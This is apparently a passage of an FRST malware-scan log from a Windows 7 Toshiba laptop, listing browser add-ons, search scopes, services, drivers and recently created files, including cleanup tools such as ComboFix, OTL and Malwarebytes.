(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch

HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://start.toshiba.com/

StartMenuInternet: IEXPLORE.EXE - C:\Program Files (x86)\Internet Explorer\iexplore.exe

SearchScopes: HKLM - DefaultScope {2D1389C8-B7A4-42B3-9385-7287A26C0DF5} URL = http://www.google.com/search?sourceid=ie9&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7TSNP

SearchScopes: HKLM - {2C284C26-5B06-4DFC-B46C-9D2EA294202A} URL = http://search.live.com/results.aspx?q={searchTerms}&FORM=HPNTDF

SearchScopes: HKLM - {2D1389C8-B7A4-42B3-9385-7287A26C0DF5} URL = http://www.google.com/search?sourceid=ie9&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7TSNP

SearchScopes: HKLM - {3F69DA71-DC06-4D09-BEF6-BC86B2EA700C} URL = http://www.ask.com/web?q={searchterms}&l=dis&o=ushpl

SearchScopes: HKLM-x32 - DefaultScope {2D1389C8-B7A4-42B3-9385-7287A26C0DF5} URL = http://www.google.com/search?sourceid=ie9&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7TSNP

SearchScopes: HKLM-x32 - {2C284C26-5B06-4DFC-B46C-9D2EA294202A} URL = http://search.live.com/results.aspx?q={searchTerms}&FORM=HPNTDF

SearchScopes: HKLM-x32 - {2D1389C8-B7A4-42B3-9385-7287A26C0DF5} URL = http://www.google.com/search?sourceid=ie9&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7TSNP

SearchScopes: HKLM-x32 - {3F69DA71-DC06-4D09-BEF6-BC86B2EA700C} URL = http://www.ask.com/web?q={searchterms}&l=dis&o=ushpl

SearchScopes: HKCU - DefaultScope {2D1389C8-B7A4-42B3-9385-7287A26C0DF5} URL = http://www.google.com/search?sourceid=ie9&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7TSNP_enUS476

SearchScopes: HKCU - {2D1389C8-B7A4-42B3-9385-7287A26C0DF5} URL = http://www.google.com/search?sourceid=ie9&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7TSNP_enUS476

SearchScopes: HKCU - {3F69DA71-DC06-4D09-BEF6-BC86B2EA700C} URL =

SearchScopes: HKCU - {AFBCB7E0-F91A-4951-9F31-58FEE57A25C4} URL = http://nortonsafe.search.ask.com/web?q={SEARCHTERMS}&o=APN10506&l=dis&prt=360&chn=retail&geo=US&ver=21&locale=en_US&gct=kwd&qsrc=2869

SearchScopes: HKCU - {C6375EBC-5C3D-4491-AADA-B48CB13B0238} URL = http://www.google.com/search?sourceid=ie9&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7TSNP

BHO: Norton Identity Protection -> {602ADB0E-4AFF-4217-8AA1-95DAC4DFA408} -> C:\Program Files (x86)\Norton 360\Engine64\21.6.0.32\coIEPlg.dll (Symantec Corporation)

BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)

BHO: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll (Google Inc.)

BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)

BHO: TOSHIBA Media Controller Plug-in -> {F3C88694-EFFA-4d78-B409-54B7B2535B14} -> C:\Program Files (x86)\TOSHIBA\TOSHIBA Media Controller Plug-in\x64\TOSHIBAMediaControllerIE.dll (TOSHIBA Corporation)

BHO-x32: Norton Identity Protection -> {602ADB0E-4AFF-4217-8AA1-95DAC4DFA408} -> C:\Program Files (x86)\Norton 360\Engine\21.6.0.32\coIEPlg.dll (Symantec Corporation)

BHO-x32: Norton Vulnerability Protection -> {6D53EC84-6AAE-4787-AEEE-F4628F01010C} -> C:\Program Files (x86)\Norton 360\Engine\21.6.0.32\IPS\IPSBHO.DLL (Symantec Corporation)

BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)

BHO-x32: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.)

BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)

BHO-x32: Java Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre6\bin\jp2ssv.dll (Sun Microsystems, Inc.)

BHO-x32: TOSHIBA Media Controller Plug-in -> {F3C88694-EFFA-4d78-B409-54B7B2535B14} -> C:\Program Files (x86)\TOSHIBA\TOSHIBA Media Controller Plug-in\TOSHIBAMediaControllerIE.dll (TOSHIBA Corporation)

Toolbar: HKLM - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll (Google Inc.)

Toolbar: HKLM - Norton Toolbar - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - C:\Program Files (x86)\Norton 360\Engine64\21.6.0.32\coIEPlg.dll (Symantec Corporation)

Toolbar: HKLM-x32 - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.)

Toolbar: HKLM-x32 - Norton Toolbar - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - C:\Program Files (x86)\Norton 360\Engine\21.6.0.32\coIEPlg.dll (Symantec Corporation)

Toolbar: HKCU - Google Toolbar - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll (Google Inc.)

DPF: HKLM-x32 {02BCC737-B171-4746-94C9-0D8A0B2C0089} http://office.microsoft.com/sites/production/ieawsdc32.cab

DPF: HKLM-x32 {36299202-09EF-4ABF-ADB9-47C599DBE778} https://www.hpwindows7upgrade.arvato.com/north_america/Endcustomer/HPProdDetect.cab

DPF: HKLM-x32 {49232000-16E4-426C-A231-62846947304B} https://wimpro.cce.hp.com/ChatEntry/downloads/sysinfo.cab

DPF: HKLM-x32 {73ECB3AA-4717-450C-A2AB-D00DAD9EE203} http://h20270.www2.hp.com/ediags/gmn2/install/HPProductDetection2.cab

DPF: HKLM-x32 {DF780F87-FF2B-4DF8-92D0-73DB16A1543A} http://zone.msn.com/bingame/popcaploader_v10.cab

DPF: HKLM-x32 {E2883E8F-472F-4FB0-9522-AC9BF37916A7} http://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab

Tcpip\Parameters: [DhcpNameServer] 192.168.1.254

FireFox:

========

FF Plugin: @adobe.com/FlashPlayer -> C:\windows\system32\Macromed\Flash\NPSWF64_15_0_0_152.dll ()

FF Plugin: @microsoft.com/GENUINE -> disabled No File

FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)

FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~2\Office14\NPAUTHZ.DLL (Microsoft Corporation)

FF Plugin-x32: @adobe.com/FlashPlayer -> C:\windows\SysWOW64\Macromed\Flash\NPSWF32_15_0_0_152.dll ()

FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll ()

FF Plugin-x32: @Google.com/GoogleEarthPlugin -> C:\Program Files (x86)\Google\Google Earth\plugin\npgeplugin.dll (Google)

FF Plugin-x32: @java.com/JavaPlugin -> C:\Program Files (x86)\Java\jre6\bin\new_plugin\npjp2.dll (Sun Microsystems, Inc.)

FF Plugin-x32: @microsoft.com/GENUINE -> disabled No File

FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)

FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~3\Office14\NPAUTHZ.DLL (Microsoft Corporation)

FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~3\Office14\NPSPWRAP.DLL (Microsoft Corporation)

FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)

FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3538.0513 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)

FF Plugin-x32: @microsoft.com/WPF,version=3.5 -> c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll No File

FF Plugin-x32: @nosltd.com/getPlus+®,version=1.6.2.102 -> C:\Program Files (x86)\NOS\bin\np_gp.dll No File

FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.)

FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.)

FF Plugin-x32: @WildTangent.com/GamesAppPresenceDetector,Version=1.0 -> C:\Program Files (x86)\WildTangent Games\App\BrowserIntegration\Registered\0\NP_wtapp.dll ()

FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)

FF HKLM-x32\...\Firefox\Extensions: [{20a82645-c095-46ed-80e3-08825760534b}] - c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension

FF HKLM-x32\...\Firefox\Extensions: [{2D3F3651-74B9-4795-BDEC-6DA2F431CB62}] - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\N360_21.6.0.32\coFFPlgn

FF Extension: Norton Toolbar - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\N360_21.6.0.32\coFFPlgn [2014-10-28]

Chrome:

=======

CHR HKLM\...\Chrome\Extension: [mkfokfffehpeedafpekjeddnmnjhmcmk] - C:\Program Files (x86)\Norton 360\Engine\21.6.0.32\Exts\Chrome.crx [2014-10-19]

CHR HKLM-x32\...\Chrome\Extension: [mkfokfffehpeedafpekjeddnmnjhmcmk] - C:\Program Files (x86)\Norton 360\Engine\21.6.0.32\Exts\Chrome.crx [2014-10-19]

==================== Services (Whitelisted) =================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R4 MBAMScheduler; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe [1871160 2014-10-01] (Malwarebytes Corporation)

R2 MBAMService; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe [968504 2014-10-01] (Malwarebytes Corporation)

R2 Motorola Device Manager; C:\Program Files (x86)\Motorola Mobility\Motorola Device Manager\MotoHelperService.exe [137528 2013-11-15] (Motorola Mobility LLC)

S3 MyWiFiDHCPDNS; C:\Program Files\Intel\WiFi\bin\PanDhcpDns.exe [340240 2011-06-01] ()

R2 N360; C:\Program Files (x86)\Norton 360\Engine\21.6.0.32\N360.exe [265040 2014-09-21] (Symantec Corporation)

R2 Norton PC Checkup Application Launcher; C:\Program Files (x86)\PC Checkup\SymcPCCULaunchSvc.exe [132056 2012-11-20] (Symantec Corporation)

R2 PCCUJobMgr; C:\Program Files (x86)\Norton PC Checkup\Engine\2.0.13.11\ccSvcHst.exe [126392 2011-07-19] (Symantec Corporation)

R2 PST Service; C:\Program Files (x86)\Motorola\MotForwardDaemon\ForwardDaemon.exe [65657 2011-09-02] (Motorola) [File not signed]

R2 Thpsrv; C:\windows\system32\ThpSrv.exe [558592 2011-04-20] (TOSHIBA Corporation) [File not signed]

R2 UDSS; c:\Program Files (x86)\Common Files\Ulead Systems\UDSS\UDSS.exe [30064 2011-03-11] ()

==================== Drivers (Whitelisted) ====================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

U5 AppMgmt; C:\Windows\system32\svchost.exe [27648 2011-03-01] (Microsoft Corporation)

R1 BHDrvx64; C:\Program Files (x86)\Norton 360\NortonData\21.6.0.32\Definitions\BASHDefs\20141024.001\BHDrvx64.sys [1587416 2014-10-03] (Symantec Corporation)

R1 ccSet_N360; C:\Windows\system32\drivers\N360x64\1506000.020\ccSetx64.sys [162392 2014-02-20] (Symantec Corporation)

S2 DgiVecp; C:\windows\system32\Drivers\DgiVecp.sys [54072 2007-08-12] (Samsung Electronics)

S2 DgiVecp; C:\windows\SysWOW64\Drivers\DgiVecp.sys [41984 2007-08-12] (Samsung Electronics Co., Ltd.) [File not signed]

R1 eeCtrl; C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\eeCtrl64.sys [487216 2014-08-26] (Symantec Corporation)

R3 EraserUtilRebootDrv; C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\EraserUtilRebootDrv.sys [142640 2014-08-26] (Symantec Corporation)

R1 IDSVia64; C:\Program Files (x86)\Norton 360\NortonData\21.6.0.32\Definitions\IPSDefs\20141028.001\IDSvia64.sys [633560 2014-10-17] (Symantec Corporation)

R3 MBAMProtector; C:\windows\system32\drivers\mbam.sys [25816 2014-10-01] (Malwarebytes Corporation)

R3 MBAMSwissArmy; C:\windows\system32\drivers\MBAMSwissArmy.sys [129752 2014-10-29] (Malwarebytes Corporation)

R3 MBAMWebAccessControl; C:\windows\system32\drivers\mwac.sys [63704 2014-10-01] (Malwarebytes Corporation)

S3 MREMP50; C:\Program Files (x86)\Common Files\Motive\MREMP50.sys [21248 2012-12-18] (Printing Communications Assoc., Inc. (PCAUSA)) [File not signed]

R3 NAVENG; C:\Program Files (x86)\Norton 360\NortonData\21.6.0.32\Definitions\VirusDefs\20141028.016\ENG64.SYS [129752 2014-08-11] (Symantec Corporation)

R3 NAVEX15; C:\Program Files (x86)\Norton 360\NortonData\21.6.0.32\Definitions\VirusDefs\20141028.016\EX64.SYS [2137304 2014-08-11] (Symantec Corporation)

R3 SRTSP; C:\Windows\system32\drivers\N360x64\1506000.020\SRTSP64.SYS [876248 2014-08-25] (Symantec Corporation)

R1 SRTSPX; C:\Windows\system32\drivers\N360x64\1506000.020\SRTSPX64.SYS [37592 2014-08-25] (Symantec Corporation)

R0 SymDS; C:\Windows\System32\drivers\N360x64\1506000.020\SYMDS64.SYS [493656 2014-08-25] (Symantec Corporation)

R0 SymEFA; C:\Windows\System32\drivers\N360x64\1506000.020\SYMEFA64.SYS [1148120 2014-08-25] (Symantec Corporation)

R3 SymEvent; C:\windows\system32\Drivers\SYMEVENT64x86.SYS [177752 2014-10-19] (Symantec Corporation)

R1 SymIRON; C:\Windows\system32\drivers\N360x64\1506000.020\Ironx64.SYS [266968 2014-08-06] (Symantec Corporation)

R1 SymNetS; C:\Windows\system32\drivers\N360x64\1506000.020\SYMNETS.SYS [593112 2014-08-25] (Symantec Corporation)

U3 catchme; \??\C:\ComboFix\catchme.sys [X]

S3 motccgpfl; system32\DRIVERS\motccgpfl.sys [X]

S3 MREMP50a64; \??\C:\PROGRA~1\COMMON~1\Motive\MREMP50a64.SYS [X]

S3 MREMPR5; \??\C:\PROGRA~1\COMMON~1\Motive\MREMPR5.SYS [X]

S3 MRENDIS5; \??\C:\PROGRA~1\COMMON~1\Motive\MRENDIS5.SYS [X]

S3 MRESP50; \??\C:\PROGRA~2\COMMON~1\Motive\MRESP50.SYS [X]

S3 MRESP50a64; \??\C:\PROGRA~1\COMMON~1\Motive\MRESP50a64.SYS [X]

==================== NetSvcs (Whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)

==================== One Month Created Files and Folders ========

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-10-29 08:13 - 2014-10-29 08:13 - 00139820 _____ () C:\Users\ADH.Heathman-PC\Desktop\OTL.Txt

2014-10-29 08:13 - 2014-10-29 08:13 - 00076484 _____ () C:\Users\ADH.Heathman-PC\Desktop\Extras.Txt

2014-10-29 08:07 - 2014-10-29 08:04 - 00602112 _____ (OldTimer Tools) C:\Users\ADH.Heathman-PC\Desktop\OTL.exe

2014-10-29 07:43 - 2014-10-29 07:43 - 00025100 _____ () C:\ComboFix.txt

2014-10-29 07:08 - 2011-06-26 01:45 - 00256000 _____ () C:\windows\PEV.exe

2014-10-29 07:08 - 2010-11-07 12:20 - 00208896 _____ () C:\windows\MBR.exe

2014-10-29 07:08 - 2009-04-19 23:56 - 00060416 _____ (NirSoft) C:\windows\NIRCMD.exe

2014-10-29 07:08 - 2000-08-30 19:00 - 00518144 _____ (SteelWerX) C:\windows\SWREG.exe

2014-10-29 07:08 - 2000-08-30 19:00 - 00406528 _____ (SteelWerX) C:\windows\SWSC.exe

2014-10-29 07:08 - 2000-08-30 19:00 - 00098816 _____ () C:\windows\sed.exe

2014-10-29 07:08 - 2000-08-30 19:00 - 00080412 _____ () C:\windows\grep.exe

2014-10-29 07:08 - 2000-08-30 19:00 - 00068096 _____ () C:\windows\zip.exe

2014-10-29 07:07 - 2014-10-29 07:44 - 00000000 ____D () C:\Qoobox

2014-10-29 07:06 - 2014-10-29 07:38 - 00000000 ____D () C:\windows\erdnt

2014-10-29 07:05 - 2014-10-29 07:06 - 05591672 ____R (Swearware) C:\Users\ADH.Heathman-PC\Desktop\ComboFix.exe

2014-10-28 22:37 - 2014-10-28 22:37 - 00441854 _____ () C:\Users\Heathman\Documents\cc_20141028_223709.reg

2014-10-28 22:33 - 2014-10-28 22:35 - 04974864 _____ (Piriform Ltd) C:\Users\Heathman\Downloads\ccsetup419.exe

2014-10-28 22:22 - 2014-10-29 09:20 - 00000000 ____D () C:\Users\ADH.Heathman-PC\Desktop\FRST64

2014-10-28 22:04 - 2014-10-29 09:20 - 00000000 ____D () C:\FRST

2014-10-27 17:51 - 2014-10-27 17:54 - 120407800 _____ (Microsoft Corporation) C:\Users\ADH.Heathman-PC\Downloads\msert.exe

2014-10-24 18:49 - 2014-10-29 07:44 - 00000000 ___HD () C:\ProgramData\{9A88E103-A20A-4EA5-8636-C73B709A5BF8}

2014-10-20 12:22 - 2014-09-04 21:11 - 06584320 _____ (Microsoft Corporation) C:\windows\system32\mstscax.dll

2014-10-20 12:22 - 2014-09-04 20:52 - 05703168 _____ (Microsoft Corporation) C:\windows\SysWOW64\mstscax.dll

2014-10-19 16:51 - 2013-10-01 21:22 - 00056832 _____ (Microsoft Corporation) C:\windows\system32\Drivers\TsUsbFlt.sys

2014-10-19 16:51 - 2013-10-01 21:11 - 00013824 _____ (Microsoft Corporation) C:\windows\system32\TsUsbRedirectionGroupPolicyControl.exe

2014-10-19 16:51 - 2013-10-01 21:08 - 00012800 _____ (Microsoft Corporation) C:\windows\system32\TsUsbRedirectionGroupPolicyExtension.dll

2014-10-19 16:51 - 2013-10-01 20:48 - 00056832 _____ (Microsoft Corporation) C:\windows\system32\MsRdpWebAccess.dll

2014-10-19 16:51 - 2013-10-01 20:48 - 00018944 _____ (Microsoft Corporation) C:\windows\system32\wksprtPS.dll

2014-10-19 16:51 - 2013-10-01 20:29 - 00062976 _____ (Microsoft Corporation) C:\windows\system32\tsgqec.dll

2014-10-19 16:51 - 2013-10-01 20:10 - 00044544 _____ (Microsoft Corporation) C:\windows\system32\TsUsbGDCoInstaller.dll

2014-10-19 16:51 - 2013-10-01 19:15 - 01057280 _____ (Microsoft Corporation) C:\windows\system32\rdvidcrl.dll

2014-10-19 16:51 - 2013-10-01 19:14 - 00050176 _____ (Microsoft Corporation) C:\windows\SysWOW64\MsRdpWebAccess.dll

2014-10-19 16:51 - 2013-10-01 19:14 - 00017920 _____ (Microsoft Corporation) C:\windows\SysWOW64\wksprtPS.dll

2014-10-19 16:51 - 2013-10-01 19:08 - 00083968 _____ (Microsoft Corporation) C:\windows\system32\TSWbPrxy.exe

2014-10-19 16:51 - 2013-10-01 19:01 - 00420864 _____ (Microsoft Corporation) C:\windows\system32\wksprt.exe

2014-10-19 16:51 - 2013-10-01 18:58 - 00053248 _____ (Microsoft Corporation) C:\windows\SysWOW64\tsgqec.dll

2014-10-19 16:51 - 2013-10-01 18:31 - 01147392 _____ (Microsoft Corporation) C:\windows\system32\mstsc.exe

2014-10-19 16:51 - 2013-10-01 18:08 - 00855552 _____ (Microsoft Corporation) C:\windows\SysWOW64\rdvidcrl.dll

2014-10-19 16:51 - 2013-10-01 17:34 - 01068544 _____ (Microsoft Corporation) C:\windows\SysWOW64\mstsc.exe

2014-10-19 16:02 - 2014-10-19 16:02 - 00000000 ____D () C:\windows\System32\Tasks\Norton 360

2014-10-19 16:00 - 2014-10-19 16:00 - 00177752 _____ (Symantec Corporation) C:\windows\system32\Drivers\SYMEVENT64x86.SYS

2014-10-19 16:00 - 2014-10-19 16:00 - 00008222 _____ () C:\windows\system32\Drivers\SYMEVENT64x86.CAT

2014-10-19 16:00 - 2014-10-19 16:00 - 00002402 _____ () C:\Users\Public\Desktop\Norton 360.lnk

2014-10-19 16:00 - 2014-10-19 16:00 - 00000000 ___RD () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Norton 360

2014-10-19 16:00 - 2014-10-19 16:00 - 00000000 ____D () C:\Program Files (x86)\Norton 360

2014-10-19 15:56 - 2014-10-19 15:56 - 01021968 _____ (Symantec Corporation) C:\Users\Heathman\Downloads\NortonN360Downloader.exe

2014-10-19 15:49 - 2014-09-24 21:08 - 00371712 _____ (Microsoft Corporation) C:\windows\system32\qdvd.dll

2014-10-19 15:49 - 2014-09-24 20:40 - 00519680 _____ (Microsoft Corporation) C:\windows\SysWOW64\qdvd.dll

2014-10-19 15:48 - 2014-10-09 21:05 - 00507392 _____ (Microsoft Corporation) C:\windows\system32\aepdu.dll

2014-10-19 15:48 - 2014-10-09 21:05 - 00276480 _____ (Microsoft Corporation) C:\windows\system32\generaltel.dll

2014-10-19 15:48 - 2014-10-09 21:00 - 00424448 _____ (Microsoft Corporation) C:\windows\system32\aeinv.dll

2014-10-19 15:48 - 2014-09-28 19:58 - 03198976 _____ (Microsoft Corporation) C:\windows\system32\win32k.sys

2014-10-19 15:48 - 2014-09-17 21:00 - 03241472 _____ (Microsoft Corporation) C:\windows\system32\msi.dll

2014-10-19 15:48 - 2014-09-17 20:32 - 02363904 _____ (Microsoft Corporation) C:\windows\SysWOW64\msi.dll

2014-10-19 15:48 - 2014-09-04 00:23 - 00424448 _____ (Microsoft Corporation) C:\windows\system32\rastls.dll

2014-10-19 15:48 - 2014-09-04 00:04 - 00372736 _____ (Microsoft Corporation) C:\windows\SysWOW64\rastls.dll

2014-10-19 15:48 - 2014-08-28 21:07 - 03179520 _____ (Microsoft Corporation) C:\windows\system32\rdpcorets.dll

2014-10-19 15:48 - 2014-07-16 21:07 - 00681984 _____ (Microsoft Corporation) C:\windows\system32\termsrv.dll

2014-10-19 15:48 - 2014-07-16 21:07 - 00455168 _____ (Microsoft Corporation) C:\windows\system32\winlogon.exe

2014-10-19 15:48 - 2014-07-16 21:07 - 00235520 _____ (Microsoft Corporation) C:\windows\system32\winsta.dll

2014-10-19 15:48 - 2014-07-16 21:07 - 00150528 _____ (Microsoft Corporation) C:\windows\system32\rdpcorekmts.dll

2014-10-19 15:48 - 2014-07-16 21:07 - 00086528 _____ (Microsoft Corporation) C:\windows\system32\TSpkg.dll

2014-10-19 15:48 - 2014-07-16 21:07 - 00022016 _____ (Microsoft Corporation) C:\windows\system32\credssp.dll

2014-10-19 15:48 - 2014-07-16 20:40 - 00157696 _____ (Microsoft Corporation) C:\windows\SysWOW64\winsta.dll

2014-10-19 15:48 - 2014-07-16 20:39 - 00065536 _____ (Microsoft Corporation) C:\windows\SysWOW64\TSpkg.dll

2014-10-19 15:48 - 2014-07-16 20:39 - 00017408 _____ (Microsoft Corporation) C:\windows\SysWOW64\credssp.dll

2014-10-19 15:48 - 2014-07-16 20:21 - 00212480 _____ (Microsoft Corporation) C:\windows\system32\Drivers\rdpwd.sys

2014-10-19 15:48 - 2014-07-16 20:21 - 00039936 _____ (Microsoft Corporation) C:\windows\system32\Drivers\tssecsrv.sys

2014-10-19 15:48 - 2014-07-08 21:03 - 00007168 _____ (Microsoft Corporation) C:\windows\system32\KBDYAK.DLL

2014-10-19 15:48 - 2014-07-08 21:03 - 00007168 _____ (Microsoft Corporation) C:\windows\system32\KBDTAT.DLL

2014-10-19 15:48 - 2014-07-08 21:03 - 00007168 _____ (Microsoft Corporation) C:\windows\system32\KBDRU1.DLL

2014-10-19 15:48 - 2014-07-08 21:03 - 00007168 _____ (Microsoft Corporation) C:\windows\system32\KBDBASH.DLL

2014-10-19 15:48 - 2014-07-08 21:03 - 00006656 _____ (Microsoft Corporation) C:\windows\system32\KBDRU.DLL

2014-10-19 15:48 - 2014-07-08 20:31 - 00007168 _____ (Microsoft Corporation) C:\windows\SysWOW64\KBDYAK.DLL

2014-10-19 15:48 - 2014-07-08 20:31 - 00007168 _____ (Microsoft Corporation) C:\windows\SysWOW64\KBDTAT.DLL

2014-10-19 15:48 - 2014-07-08 20:31 - 00006656 _____ (Microsoft Corporation) C:\windows\SysWOW64\KBDRU1.DLL

2014-10-19 15:48 - 2014-07-08 20:31 - 00006656 _____ (Microsoft Corporation) C:\windows\SysWOW64\KBDRU.DLL

2014-10-19 15:48 - 2014-07-08 20:31 - 00006656 _____ (Microsoft Corporation) C:\windows\SysWOW64\KBDBASH.DLL

2014-10-19 15:48 - 2014-07-08 17:38 - 00419992 _____ () C:\windows\system32\locale.nls

2014-10-19 15:48 - 2014-07-08 17:30 - 00419992 _____ () C:\windows\SysWOW64\locale.nls

2014-10-19 15:48 - 2014-06-18 17:23 - 01943696 _____ (Microsoft Corporation) C:\windows\system32\dfshim.dll

2014-10-19 15:48 - 2014-06-18 17:23 - 01131664 _____ (Microsoft Corporation) C:\windows\SysWOW64\dfshim.dll

2014-10-19 15:48 - 2014-06-18 17:23 - 00156824 _____ (Microsoft Corporation) C:\windows\SysWOW64\mscorier.dll

2014-10-19 15:48 - 2014-06-18 17:23 - 00156312 _____ (Microsoft Corporation) C:\windows\system32\mscorier.dll

2014-10-19 15:48 - 2014-06-18 17:23 - 00081560 _____ (Microsoft Corporation) C:\windows\SysWOW64\mscories.dll

2014-10-19 15:48 - 2014-06-18 17:23 - 00073880 _____ (Microsoft Corporation) C:\windows\system32\mscories.dll

2014-10-19 15:47 - 2014-10-19 15:47 - 00896048 _____ () C:\Users\ADH.Heathman-PC\Downloads\Norton_Removal_Tool.exe

2014-10-19 15:45 - 2014-09-20 00:18 - 00051712 _____ (Microsoft Corporation) C:\windows\system32\ie4uinit.exe

2014-10-19 15:45 - 2014-09-20 00:17 - 02236928 _____ (Microsoft Corporation) C:\windows\system32\wininet.dll

2014-10-19 15:45 - 2014-09-20 00:17 - 01407488 _____ (Microsoft Corporation) C:\windows\system32\urlmon.dll

2014-10-19 15:45 - 2014-09-20 00:16 - 19280896 _____ (Microsoft Corporation) C:\windows\system32\mshtml.dll

2014-10-19 15:45 - 2014-09-20 00:16 - 15399424 _____ (Microsoft Corporation) C:\windows\system32\ieframe.dll

2014-10-19 15:45 - 2014-09-20 00:16 - 03959296 _____ (Microsoft Corporation) C:\windows\system32\jscript9.dll

2014-10-19 15:45 - 2014-09-20 00:16 - 02655232 _____ (Microsoft Corporation) C:\windows\system32\iertutil.dll

2014-10-19 15:45 - 2014-09-20 00:16 - 00855552 _____ (Microsoft Corporation) C:\windows\system32\jscript.dll

2014-10-19 15:45 - 2014-09-20 00:16 - 00603136 _____ (Microsoft Corporation) C:\windows\system32\msfeeds.dll

2014-10-19 15:45 - 2014-09-20 00:16 - 00526336 _____ (Microsoft Corporation) C:\windows\system32\ieui.dll

2014-10-19 15:45 - 2014-09-20 00:16 - 00255488 _____ (Microsoft Corporation) C:\windows\system32\iedkcs32.dll

2014-10-19 15:45 - 2014-09-20 00:16 - 00197120 _____ (Microsoft Corporation) C:\windows\system32\msrating.dll

2014-10-19 15:45 - 2014-09-20 00:16 - 00136704 _____ (Microsoft Corporation) C:\windows\system32\iesysprep.dll

2014-10-19 15:45 - 2014-09-20 00:16 - 00097280 _____ (Microsoft Corporation) C:\windows\system32\mshtmled.dll

2014-10-19 15:45 - 2014-09-20 00:16 - 00067072 _____ (Microsoft Corporation) C:\windows\system32\iesetup.dll

2014-10-19 15:45 - 2014-09-20 00:16 - 00053760 _____ (Microsoft Corporation) C:\windows\system32\jsproxy.dll

2014-10-19 15:45 - 2014-09-20 00:16 - 00039936 _____ (Microsoft Corporation) C:\windows\system32\iernonce.dll

2014-10-19 15:45 - 2014-09-20 00:15 - 01508864 _____ (Microsoft Corporation) C:\windows\system32\inetcpl.cpl

